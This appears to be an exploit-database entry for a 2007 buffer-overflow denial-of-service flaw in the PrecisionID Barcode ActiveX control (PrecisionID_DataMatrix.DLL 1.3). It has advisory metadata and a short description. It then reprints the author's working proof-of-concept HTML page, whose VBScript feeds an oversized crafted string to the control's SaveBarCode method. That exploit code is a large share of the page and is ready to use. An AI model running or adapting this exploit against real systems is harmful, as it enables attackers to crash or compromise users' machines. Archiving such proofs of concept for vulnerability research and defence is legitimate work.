PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denial of Service

vendor:

Barcode ActiveX

by:

shinnai

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: Barcode ActiveX

Affected Version From: Not available

Affected Version To: Not available

Patch Exists: NO

Related CWE: Not available

CPE: Not available

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denial of Service

This exploit targets the PrecisionID Barcode ActiveX control, specifically the PrecisionID_DataMatrix.DLL version 1.3. By sending a specially crafted input, an attacker can cause a denial of service condition in the affected software. The exploit code is written in VBScript and utilizes a buffer overflow vulnerability.

Mitigation:

The vendor does not provide a specific mitigation or remediation for this vulnerability. However, users are advised to update to the latest version of the software and follow best practices for secure ActiveX control usage.

Source

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/12</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
 <b>PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denail of Service</b>
 url: http://www.precisionid.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to these exploits.
--------------------------------------------------------------------------------

<object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff=String(304,"B")
     
  get_eax = unescape("%D1%60%61%61")

  buff2 = String(709,"C")

  egg = buff + get_eax + buff2
  
  test.SaveBarCode egg
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-12]